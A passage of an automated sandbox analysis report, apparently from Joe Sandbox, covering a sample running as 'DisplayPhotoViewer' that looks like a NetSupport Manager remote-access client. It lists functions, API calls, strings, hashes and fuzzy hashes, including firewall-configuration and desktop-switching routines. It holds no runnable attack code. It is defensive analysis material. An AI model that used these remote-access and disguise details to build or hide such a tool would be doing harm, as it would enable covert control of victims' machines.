                                                                                                    Function 1102B560 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102C668,00000000,218EC38C,?,00000000,00000000), ref: 1102B794
                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102B7AA
                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102B7BE
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B7C5
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102B7D6
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B7E6
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102B832
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102B85F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                    • API String ID: 83693535-2077998243
                                                                                                    • Opcode ID: 6117df8d8edfa6c467e42f7f36d1ea0e68c26896c4090ecc604c1ce5efac7cbc
                                                                                                    • Instruction ID: 1489df21e4f04eae50a298ebb4fc1052a42c12b70273fde2dbbd7e2a57606348
                                                                                                    • Opcode Fuzzy Hash: 6117df8d8edfa6c467e42f7f36d1ea0e68c26896c4090ecc604c1ce5efac7cbc
                                                                                                    • Instruction Fuzzy Hash: F3B1A075E016259FDB21CF64CC84BADB7B4FB88308F5441E9E919AB381DB70AA81CF50
                                                                                                    Function 1112AAC0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wsprintfA.USER32 ref: 1112AB30
                                                                                                    • GetTickCount.KERNEL32 ref: 1112AB61
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112AB74
                                                                                                    • GetTickCount.KERNEL32 ref: 1112AB7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                    • API String ID: 1170620360-4157686185
                                                                                                    • Opcode ID: c6d1797538c56cdb3e5ea82af0ec1d3f89e9d161f0c9727a25a5790fd77047cd
                                                                                                    • Instruction ID: d98deaf66d1cc1216b4e6139f2386983c17190061241ee5f4280da304609afb1
                                                                                                    • Opcode Fuzzy Hash: c6d1797538c56cdb3e5ea82af0ec1d3f89e9d161f0c9727a25a5790fd77047cd
                                                                                                    • Instruction Fuzzy Hash: DA317BBAE4132967E700DBA5BD81BA9FB69DB8031DF5004B5FD04E6284EE31B540CBD1
                                                                                                    Function 110258F0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strtok.LIBCMT ref: 11025976
                                                                                                    • _strtok.LIBCMT ref: 110259B0
                                                                                                    • Sleep.KERNEL32(1102E3C3,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11025AA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$Sleep
                                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                    • API String ID: 2009458258-3774545468
                                                                                                    • Opcode ID: a075b3581749e82d003199fc84e2b4c496c23a71c77858b715190bbbdae9564d
                                                                                                    • Instruction ID: e079c421c2d37e2d4b9cb2c8bbfd30cdf6c2abfa3fa8a15dbf7189e5d0ffc6ef
                                                                                                    • Opcode Fuzzy Hash: a075b3581749e82d003199fc84e2b4c496c23a71c77858b715190bbbdae9564d
                                                                                                    • Instruction Fuzzy Hash: 6E51E335F003569BDB11CFD4C881BEEFBF1AB85318F5441A9D85267244E7326845CB96
                                                                                                    Function 110FAEE0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110849D0: UnhookWindowsHookEx.USER32(?), ref: 110849F3
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FAEFC
                                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110FAF03
                                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FAF13
                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110FAF20
                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FAF39
                                                                                                    • GetLastError.KERNEL32 ref: 110FAF41
                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FAF57
                                                                                                    • GetLastError.KERNEL32 ref: 110FAF5F
                                                                                                    Strings
                                                                                                    • SetThreadDesktop(%s) ok, xrefs: 110FAF2B
                                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FAF49
                                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 110FAF67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                    • API String ID: 2036220054-60805735
                                                                                                    • Opcode ID: 6a2bea51135656d801aa0d07d188a7dc9201235fbfe34a05ce99e03b9e90643a
                                                                                                    • Instruction ID: c3e0a29eb9c8cca139fced83399b07850f7ecba8556923465edb446845800ba3
                                                                                                    • Opcode Fuzzy Hash: 6a2bea51135656d801aa0d07d188a7dc9201235fbfe34a05ce99e03b9e90643a
                                                                                                    • Instruction Fuzzy Hash: 5B1106BDE04622ABD7016BB57C89F6FBE289FC121EF000038FD0695245FE34A51483B2
                                                                                                    Function 11153C10 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 11153C38
                                                                                                    • GetLastError.KERNEL32 ref: 11153C45
                                                                                                    • wsprintfA.USER32 ref: 11153C58
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 11153C9C
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 11153CA9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                    • API String ID: 1734919802-1728070458
                                                                                                    • Opcode ID: b56cac17733e484993b247ccf1455e4cc16d6b3c835815cfd0491f03e34b8e7a
                                                                                                    • Instruction ID: 0ed25929dc09606fd7066c4a296ba98613e4ab73af3d6609f9101cf99f62866e
                                                                                                    • Opcode Fuzzy Hash: b56cac17733e484993b247ccf1455e4cc16d6b3c835815cfd0491f03e34b8e7a
                                                                                                    • Instruction Fuzzy Hash: 0E110675919328ABC731EFE6DDC09AAF7B4FF14308F40422FE86583244DB70A9408B95
                                                                                                    Function 11108440 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 111084AA
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 111084BF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111084D6
                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,1102F5F3,00000001,00000000), ref: 111084E9
                                                                                                    • InitializeCriticalSection.KERNEL32(111E4480,?,1102F5F3,00000001,00000000), ref: 111084F8
                                                                                                    • EnterCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 1110850C
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F5F3), ref: 11108532
                                                                                                    • LeaveCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 111085BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                    • API String ID: 1976012330-1024648535
                                                                                                    • Opcode ID: 5b7edb72d8375859367d23a0444ffab257f46350964d9916fdaac96028da149c
                                                                                                    • Instruction ID: 4ec7572ec77cdad455fdf647c0393f12da2fe1afdf62caa986e6b44a9e65212e
                                                                                                    • Opcode Fuzzy Hash: 5b7edb72d8375859367d23a0444ffab257f46350964d9916fdaac96028da149c
                                                                                                    • Instruction Fuzzy Hash: 2741E475E45A14AFDB12DFB9DC88B6EFBE4EB88708F00453AE855D3244E7319500CB61
                                                                                                    Function 1112C090 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 84windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
                                                                                                      • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                      • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                      • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                      • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                      • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    • AdjustWindowRectEx.USER32(11137B17,00CE0000,00000001,00000030), ref: 1112C0D7
                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 1112C0E8
                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 1112C0F9
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 1112C101
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 1112C107
                                                                                                    • GetDC.USER32(00000000), ref: 1112C113
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112C11E
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 1112C127
                                                                                                    • CreateWindowExA.USER32(?,NSMWClass,0B2206B0,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 1112C169
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceFreeLangMenuProcRectReleaseVersion_memset
                                                                                                    • String ID: NSMWClass
                                                                                                    • API String ID: 1971969616-4111455598
                                                                                                    • Opcode ID: f838903deaa1a77984b5b4697d66e756f1a06a96e7e200f3130f1ac7eed27a37
                                                                                                    • Instruction ID: 89fc7e3046bf32a80f81b556d9e5652573ca99749de3550d39160af8f35703aa
                                                                                                    • Opcode Fuzzy Hash: f838903deaa1a77984b5b4697d66e756f1a06a96e7e200f3130f1ac7eed27a37
                                                                                                    • Instruction Fuzzy Hash: 8F2191B6E00219AFDB10DFE5DC85FBEFBB8EB44704F514129FA15B7284D67069018BA4
                                                                                                    Function 1112F3B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                      • Part of subcall function 11092230: CoInitialize.OLE32(00000000), ref: 11092244
                                                                                                      • Part of subcall function 11092230: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11092257
                                                                                                      • Part of subcall function 11092230: CoCreateInstance.OLE32(?,00000000,00000001,111B43AC,?), ref: 11092274
                                                                                                      • Part of subcall function 11092230: CoUninitialize.OLE32 ref: 11092292
                                                                                                    • _memset.LIBCMT ref: 1112F410
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,00000000), ref: 1112F426
                                                                                                    • _strrchr.LIBCMT ref: 1112F435
                                                                                                    • _free.LIBCMT ref: 1112F486
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig2 returned 0x%x
                                                                                                    • API String ID: 3753348462-81074719
                                                                                                    • Opcode ID: e690aa9ec7a31c6a29680381434577bc38a833d4a4f4ed4b3bda87aa3bf99424
                                                                                                    • Instruction ID: 76acea1aa7e8aeb936fd0a292d1960d3adc12920eccdbc76ad6f3b4bea007ab4
                                                                                                    • Opcode Fuzzy Hash: e690aa9ec7a31c6a29680381434577bc38a833d4a4f4ed4b3bda87aa3bf99424
                                                                                                    • Instruction Fuzzy Hash: 17212E79E0022A66DB60D7659C16FDFF7689F4570CF414599E908A71C0EEF0EA40CAE2
                                                                                                    Function 1113AEB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                    • Opcode ID: fa9036cd773fd617bb4807dadab261007dc63d63d50ffa7a54c3dacae92d6917
                                                                                                    • Instruction ID: e00bc5454e7c870830340daf5ccac2ef1f50c6e3478ed7d58781a3eb56495a22
                                                                                                    • Opcode Fuzzy Hash: fa9036cd773fd617bb4807dadab261007dc63d63d50ffa7a54c3dacae92d6917
                                                                                                    • Instruction Fuzzy Hash: EB51AE76D1422A57D712CF24DC50BDEF7A8AF84319F1001A8EC99B72C4EB716A84CB92
                                                                                                    Function 11130380 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • AutoICFConfig, xrefs: 111303D0
                                                                                                    • Client, xrefs: 111303D5
                                                                                                    • DoICFConfig() OK, xrefs: 11130456
                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113046C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
